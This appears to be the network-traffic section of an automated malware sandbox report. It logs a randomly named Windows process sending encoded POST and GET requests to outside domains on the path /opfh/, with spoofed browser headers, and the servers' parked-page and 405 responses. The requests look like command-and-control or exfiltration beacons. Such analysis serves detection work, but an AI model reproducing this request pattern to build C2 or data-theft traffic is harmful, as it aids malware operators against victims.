                            Host: www.gamemaster.at
                            Origin: http://www.gamemaster.at
                            Referer: http://www.gamemaster.at/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 1250
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 43 41 53 63 36 39 66 66 36 66 4b 2f 49 6b 36 55 38 58 66 42 4d 51 42 35 34 46 51 41 64 2b 5a 33 32 70 6f 41 4a 62 58 62 53 57 46 41 32 47 62 4a 48 59 61 6d 4e 69 30 5a 37 39 48 6a 2f 46 52 43 46 6c 6f 69 59 4a 57 6f 6b 59 62 4d 55 64 72 4d 4b 6d 50 32 35 46 78 76 37 2b 78 49 78 73 2b 4f 4d 63 45 73 48 63 75 51 45 2f 49 7a 39 71 33 70 2b 6a 44 68 68 45 7a 51 42 4f 4f 41 67 71 39 4a 67 43 72 54 4d 77 44 75 66 30 46 4a 32 53 64 39 79 63 5a 38 61 78 73 70 36 48 32 4f 41 73 79 54 71 64 56 2f 69 38 57 4e 39 4b 76 39 53 6a 34 69 58 72 56 31 38 4c 68 50 4b 33 52 56 67 43 6f 4f 73 68 6c 58 4d 50 5a 7a 66 56 41 68 4d 6e 59 4e 34 77 58 57 31 57 63 55 41 79 61 78 4c 4d 67 44 6a 76 46 58 52 49 7a 61 66 32 44 52 68 70 73 6c 71 46 4a 50 39 44 7a 72 4f 38 65 73 6b 4a 5a 54 6b 59 46 6a 68 6a 56 37 7a 67 67 6c 7a 34 79 70 79 58 77 2b 6c 6d 42 2f 4a 41 65 4f 2f 46 59 59 44 4b 33 32 42 6d 4f 4e 41 4c 70 6b 6b 48 54 4f 44 54 55 76 31 54 47 74 4c 4d 42 65 36 6d 4a 50 53 73 4e 75 49 38 76 68 65 4a 4e 73 [TRUNCATED]
                            Data Ascii: R40L6=CASc69ff6fK/Ik6U8XfBMQB54FQAd+Z32poAJbXbSWFA2GbJHYamNi0Z79Hj/FRCFloiYJWokYbMUdrMKmP25Fxv7+xIxs+OMcEsHcuQE/Iz9q3p+jDhhEzQBOOAgq9JgCrTMwDuf0FJ2Sd9ycZ8axsp6H2OAsyTqdV/i8WN9Kv9Sj4iXrV18LhPK3RVgCoOshlXMPZzfVAhMnYN4wXW1WcUAyaxLMgDjvFXRIzaf2DRhpslqFJP9DzrO8eskJZTkYFjhjV7zgglz4ypyXw+lmB/JAeO/FYYDK32BmONALpkkHTODTUv1TGtLMBe6mJPSsNuI8vheJNsE5+Q8vmeXr0S82rgzou5Bqlc5yx4+qI7PgPKvLGIAwNaEiM35JNtccTLyE6f75gGCGS+D/EAoLZtAtroHQrZ60x7tbCLRlvx6H4/DlVwJ/Y6miqIxcZG6Ru98lkfqWCufY9+vP/urCU77A28aoKYegHGW0IIzeA5e4zgvcx3d7YJD0vrfGAvPfrqlAfiSfSQ0chzstWXiHvnvGg86HoQ27xu65UVnxcF2xCeRT25SFpIOfSvxGOt4kTRIIPD3OjBLEyC76IGfgl8dVSvA5+tEVoqYOfM0Ec+kbkmht0AjlpOUzl7i1QXrhB65UtIKB3RY/ww0uHYnnoluUPZ4qUygrtIp0+hM+psKXYGIaebdUcL87enEQUiXY1axTqEY8YpA2NlgZJqxDc6ghGHdwhtPgZdRUa/sevdFI+g6/vB3MXWUgvk/OPx9RbRv+x985EPH1/lMtCRKPgrmCFQjMrRLZ5xJW7qFUoDizdPsIpjnKy34XHONnp9acTgnj6OPDL3R0Nu3toEyOEeq+1/UFPha00Zht1M3QJHvpthS/K7FNTiuFkwrZMrj3tySCYtj/7W8PcGFnvtK0tyuXPp7LaMW98o2gXvcc9BrB00XN6TCbSAetx46EuHfx23nRBpPwRFz1Xu5dx9o599YTOcGOhtKWl7dWrDhsDKmy [TRUNCATED]
                            May 27, 2024 12:21:27.372297049 CEST1236INHTTP/1.1 200 OK
                            date: Mon, 27 May 2024 10:21:27 GMT
                            content-type: text/html; charset=utf-8
                            content-length: 1118
                            x-request-id: aea96830-e529-4bb6-9a6f-3e0470078c06
                            cache-control: no-store, max-age=0
                            accept-ch: sec-ch-prefers-color-scheme
                            critical-ch: sec-ch-prefers-color-scheme
                            vary: sec-ch-prefers-color-scheme
                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ZQ+VEwpDtrrrTJrz5V9Vt37TaStb+vha/Q7Nf22F8k9Ia+zQGGZvqtNOH5DHqljGPycysyQcwC3ZRI+d27MGug==
                            set-cookie: parking_session=aea96830-e529-4bb6-9a6f-3e0470078c06; expires=Mon, 27 May 2024 10:36:27 GMT; path=/
                            connection: close
                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 5a 51 2b 56 45 77 70 44 74 72 72 72 54 4a 72 7a 35 56 39 56 74 33 37 54 61 53 74 62 2b 76 68 61 2f 51 37 4e 66 32 32 46 38 6b 39 49 61 2b 7a 51 47 47 5a 76 71 74 4e 4f 48 35 44 48 71 6c 6a 47 50 79 63 79 73 79 51 63 77 43 33 5a 52 49 2b 64 32 37 4d 47 75 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ZQ+VEwpDtrrrTJrz5V9Vt37TaStb+vha/Q7Nf22F8k9Ia+zQGGZvqtNOH5DHqljGPycysyQcwC3ZRI+d27MGug==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                            May 27, 2024 12:21:27.372328997 CEST571INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWVhOTY4MzAtZTUyOS00YmI2LTlhNmYtM2UwNDcwMDc4YzA2IiwicGFnZV90aW1lIjoxNzE2ODA1Mj


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            20192.168.2.763181199.59.243.225802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:21:29.439800024 CEST457OUTGET /opfh/?R40L6=PC685LTb06jHOCK4vGHbFQZ2xkI1XLFU2OtxALHCeHx3vCzda7v1dhtYxdz770kbIy0AX5udiNTwR8fzRWvU0kdzv6lB2tOiWMAiJN+HcPhB483U4R/s/Re5ANHairphm1/7Mj/vaUsb&b2PX=hZXl7VFPKl04 HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Host: www.gamemaster.at
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            May 27, 2024 12:21:29.915868998 CEST1236INHTTP/1.1 200 OK
                            date: Mon, 27 May 2024 10:21:29 GMT
                            content-type: text/html; charset=utf-8
                            content-length: 1526
                            x-request-id: c8d0e8c0-0daf-498a-bd93-6119f968ea0c
                            cache-control: no-store, max-age=0
                            accept-ch: sec-ch-prefers-color-scheme
                            critical-ch: sec-ch-prefers-color-scheme
                            vary: sec-ch-prefers-color-scheme
                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_uFM02yiPvNGH1xQMcjEplzxa93p7kFKT9aOmybtKDnGsv2XfLjPY+0De/YYU+0POgLesJOR0aw+/WNE+pUenvA==
                            set-cookie: parking_session=c8d0e8c0-0daf-498a-bd93-6119f968ea0c; expires=Mon, 27 May 2024 10:36:29 GMT; path=/
                            connection: close
                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 75 46 4d 30 32 79 69 50 76 4e 47 48 31 78 51 4d 63 6a 45 70 6c 7a 78 61 39 33 70 37 6b 46 4b 54 39 61 4f 6d 79 62 74 4b 44 6e 47 73 76 32 58 66 4c 6a 50 59 2b 30 44 65 2f 59 59 55 2b 30 50 4f 67 4c 65 73 4a 4f 52 30 61 77 2b 2f 57 4e 45 2b 70 55 65 6e 76 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_uFM02yiPvNGH1xQMcjEplzxa93p7kFKT9aOmybtKDnGsv2XfLjPY+0De/YYU+0POgLesJOR0aw+/WNE+pUenvA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                            May 27, 2024 12:21:29.915905952 CEST979INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzhkMGU4YzAtMGRhZi00OThhLWJkOTMtNjExOWY5NjhlYTBjIiwicGFnZV90aW1lIjoxNzE2ODA1Mj


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            21192.168.2.763182213.171.195.105802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:21:34.990835905 CEST732OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.annahaywardva.co.uk
                            Origin: http://www.annahaywardva.co.uk
                            Referer: http://www.annahaywardva.co.uk/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 218
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 6d 44 32 6f 36 35 44 39 55 62 56 45 67 6e 71 71 67 4d 34 36 42 79 47 45 50 79 4c 30 4d 6a 4e 74 2b 70 65 77 64 65 6f 30 45 67 51 4c 59 73 42 6a 4f 6b 49 53 32 47 4b 6f 78 53 58 32 7a 79 44 53 30 71 43 43 75 51 46 6f 46 66 4d 57 36 51 46 64 71 6d 58 6a 2f 35 54 6f 37 4f 38 37 4c 42 39 6f 30 4d 69 6d 76 38 4f 73 31 64 55 4f 51 6b 72 54 41 53 47 30 4c 35 55 4c 62 46 71 41 4b 71 6a 6c 4c 36 63 57 77 6a 37 71 69 37 74 57 51 53 6e 58 50 55 46 67 77 56 75 6c 73 36 61 4a 4b 2f 34 43 30 46 32 35 51 33 74 45 41 66 41 62 70 67 2b 37 44 38 79 2f 6c 33 4b 6c 46 48 49 41 62 71 75 5a 39 57 54 6d 6b 63 50 33 61 56 47 67 68 72 75 64 6e 77 3d 3d
                            Data Ascii: R40L6=mD2o65D9UbVEgnqqgM46ByGEPyL0MjNt+pewdeo0EgQLYsBjOkIS2GKoxSX2zyDS0qCCuQFoFfMW6QFdqmXj/5To7O87LB9o0Mimv8Os1dUOQkrTASG0L5ULbFqAKqjlL6cWwj7qi7tWQSnXPUFgwVuls6aJK/4C0F25Q3tEAfAbpg+7D8y/l3KlFHIAbquZ9WTmkcP3aVGghrudnw==
                            May 27, 2024 12:21:35.601571083 CEST309INHTTP/1.1 405 Not Allowed
                            Server: nginx/1.20.1
                            Date: Mon, 27 May 2024 10:21:35 GMT
                            Content-Type: text/html
                            Content-Length: 157
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            22192.168.2.763183213.171.195.105802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:21:37.817570925 CEST752OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.annahaywardva.co.uk
                            Origin: http://www.annahaywardva.co.uk
                            Referer: http://www.annahaywardva.co.uk/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 238
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 6d 44 32 6f 36 35 44 39 55 62 56 45 6d 47 61 71 73 4b 77 36 4b 79 47 46 53 43 4c 30 43 44 4e 70 2b 70 61 77 64 66 74 70 45 53 6b 4c 59 4d 52 6a 63 51 55 53 78 47 4b 6f 2b 79 58 33 39 53 44 5a 30 71 65 6b 75 52 70 6f 46 66 6f 57 36 55 4a 64 70 56 76 6b 35 35 54 6d 7a 75 38 71 57 52 39 6f 30 4d 69 6d 76 38 61 53 31 64 4d 4f 51 55 62 54 42 7a 47 31 44 5a 55 49 59 46 71 41 63 61 6a 68 4c 36 64 37 77 6d 54 4d 69 35 56 57 51 57 6a 58 50 67 52 76 37 56 76 75 69 61 62 6f 4d 76 4a 4b 35 46 36 78 4a 57 6c 72 65 38 77 62 6f 57 6a 5a 5a 65 2b 54 37 6d 79 65 42 46 73 32 4d 4d 7a 73 2f 58 58 2b 70 2b 37 57 46 69 6a 4b 73 35 50 5a 78 43 4a 65 69 42 57 69 6f 4c 2b 34 33 31 4e 48 59 65 2f 51 50 4b 41 3d
                            Data Ascii: R40L6=mD2o65D9UbVEmGaqsKw6KyGFSCL0CDNp+pawdftpESkLYMRjcQUSxGKo+yX39SDZ0qekuRpoFfoW6UJdpVvk55Tmzu8qWR9o0Mimv8aS1dMOQUbTBzG1DZUIYFqAcajhL6d7wmTMi5VWQWjXPgRv7VvuiaboMvJK5F6xJWlre8wboWjZZe+T7myeBFs2MMzs/XX+p+7WFijKs5PZxCJeiBWioL+431NHYe/QPKA=
                            May 27, 2024 12:21:38.409436941 CEST309INHTTP/1.1 405 Not Allowed
                            Server: nginx/1.20.1
                            Date: Mon, 27 May 2024 10:21:38 GMT
                            Content-Type: text/html
                            Content-Length: 157
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            23192.168.2.763184213.171.195.105802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:21:40.363502979 CEST1765OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.annahaywardva.co.uk
                            Origin: http://www.annahaywardva.co.uk
                            Referer: http://www.annahaywardva.co.uk/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 1250
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 6d 44 32 6f 36 35 44 39 55 62 56 45 6d 47 61 71 73 4b 77 36 4b 79 47 46 53 43 4c 30 43 44 4e 70 2b 70 61 77 64 66 74 70 45 53 38 4c 59 2f 4a 6a 4e 42 55 53 77 47 4b 6f 33 53 58 79 39 53 44 2b 30 71 47 34 75 52 31 65 46 64 41 57 36 78 56 64 39 30 76 6b 71 5a 54 6d 78 75 38 36 4c 42 39 39 30 4d 79 69 76 38 4b 53 31 64 4d 4f 51 53 2f 54 43 69 47 31 46 5a 55 4c 62 46 72 42 4b 71 6a 46 4c 36 56 46 77 6d 58 36 69 49 31 57 58 79 48 58 4e 7a 35 76 79 56 76 73 6c 61 62 4b 4d 76 46 46 35 45 58 4b 4a 57 52 42 65 2f 67 62 6b 54 43 35 47 39 57 77 73 56 61 49 50 32 45 59 4f 75 6e 4b 36 6e 54 42 6b 75 79 7a 42 54 50 7a 74 36 50 45 6c 6c 30 6b 34 42 65 55 6e 5a 71 77 30 69 59 35 41 72 36 61 62 74 30 30 2f 4d 7a 41 66 39 52 41 55 71 6b 31 75 67 72 6f 58 54 46 47 43 4c 77 2f 33 70 58 38 35 6f 48 68 64 4a 76 6d 78 4d 35 59 49 44 39 51 4f 4f 75 56 73 64 4f 48 34 64 64 48 58 50 31 4f 68 74 75 79 65 41 67 63 2b 6f 78 4f 30 4c 38 5a 51 4e 30 52 49 76 35 4b 44 36 39 39 48 73 45 70 32 49 78 66 59 77 4a 67 [TRUNCATED]
                            Data Ascii: R40L6=mD2o65D9UbVEmGaqsKw6KyGFSCL0CDNp+pawdftpES8LY/JjNBUSwGKo3SXy9SD+0qG4uR1eFdAW6xVd90vkqZTmxu86LB990Myiv8KS1dMOQS/TCiG1FZULbFrBKqjFL6VFwmX6iI1WXyHXNz5vyVvslabKMvFF5EXKJWRBe/gbkTC5G9WwsVaIP2EYOunK6nTBkuyzBTPzt6PEll0k4BeUnZqw0iY5Ar6abt00/MzAf9RAUqk1ugroXTFGCLw/3pX85oHhdJvmxM5YID9QOOuVsdOH4ddHXP1OhtuyeAgc+oxO0L8ZQN0RIv5KD699HsEp2IxfYwJgX/FnJF3k47GSbDshLxLaxzdyVbu/0mgd1/mOMEYqQY6pDdAvFvSiRwgh6H/v8IRSy9RZojkGTsp2arK1jqZz0qCELadB9n1GPqlRTbxvghmDi2XsCP3IAER5QpkL2ppIoa9Xz9uBRlTS1c+ph8TrSFs0sWzWpDa8Jxm7+ue9Do0NYQE781Zb/ohgAOF3GVxCBO8s2QuUlNQq33PWs6ABB91HfO3xjPfmw1JSHvkFgI+NmLPPgNBgd3NOZwmM6P8kiprIFa9rvXfU4At4Vz6OlnsC94V0r+qG/cwB1RcrhujtKDaaSiHIR7/2VZlgRRtIIp60nLsSMQsk1gl+gHs7MBAsZeuChUMazt8i3L27QxZKiRmiYy7OdvHl1IP0WDqH+HMLzNDT+1G1GaJNXn/QNIfmTtabBqGfkmu86JglEBDHYld/m8A1/2Q7iWry3RapqHnUovZC6m6DWdtqqEgcV/Vt6NCCCnqgk2x1bddjDV79QmXu4e6xPJkFu/81Q95Rxk6lQo8KB0UD2YopY32eUyItvIt5RgYGWPZI5dwDySWaSaxcn5NeYxV69m/GRXMgswFIvs3t9b7y0Kzcghc2bL/6rKsSVztTR0vn0KLpt4OH0wGBeDdfDPyL8BYt0wR8TKmraaBjF/7nVlFxNBo4dIzx/I6FRb6XtP [TRUNCATED]
                            May 27, 2024 12:21:40.966272116 CEST309INHTTP/1.1 405 Not Allowed
                            Server: nginx/1.20.1
                            Date: Mon, 27 May 2024 10:21:40 GMT
                            Content-Type: text/html
                            Content-Length: 157
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            24192.168.2.763185213.171.195.105802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:21:42.893456936 CEST463OUTGET /opfh/?R40L6=rBeI5JL4SdE8nFW9pIUfBkvOLwnHMU9O9JCyLdspFwofGsVtAi0tgWeg3zHJ2XnwxoW6lgl8FdELwhlchXf8iZDZl79NZT9hgeyhr+mr8upFSzDJKwHDStxLaliRPfjpA6FezmrpjIYZ&b2PX=hZXl7VFPKl04 HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Host: www.annahaywardva.co.uk
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            May 27, 2024 12:21:43.676992893 CEST234INHTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Mon, 27 May 2024 10:21:43 GMT
                            Content-Type: text/html
                            Content-Length: 2873
                            Last-Modified: Mon, 31 Jul 2023 14:17:53 GMT
                            Connection: close
                            ETag: "64c7c291-b39"
                            Accept-Ranges: bytes
                            May 27, 2024 12:21:43.677011013 CEST1236INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69
                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Domain parking page</title> <link rel=
                            May 27, 2024 12:21:43.677021980 CEST224INData Raw: 64 2d 2d 69 73 2d 63 74 61 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 68 33 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 4c 6f 6f 6b 69 6e 67 20 74 6f 20 62 75 79 20 61 20 73 69 6d 69 6c 61 72 20 64 6f 6d 61 69 6e 20 74 6f 20 3c 62 72 3e 0a 20 20 20
                            Data Ascii: d--is-cta"> <h3> Looking to buy a similar domain to <br> <strong><span class="domainVar"></span>?</strong> </h3> <a class="cta cta--primary" rel="nofollow" id="domainSear
                            May 27, 2024 12:21:43.677026033 CEST1236INData Raw: 63 68 43 74 61 22 3e 53 74 61 72 74 20 73 65 61 72 63 68 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 61 72 64 20 63 61 72 64 2d 2d 69 73 2d 63 74 61 20 63 61 72 64
                            Data Ascii: chCta">Start search</a> </div> <div class="card card--is-cta card--with-side-icon"> <img class="card__side-icon" src="/assets/icon-magic-wand-square-orange.svg" alt=""> <h3><strong>Do more with your domain<
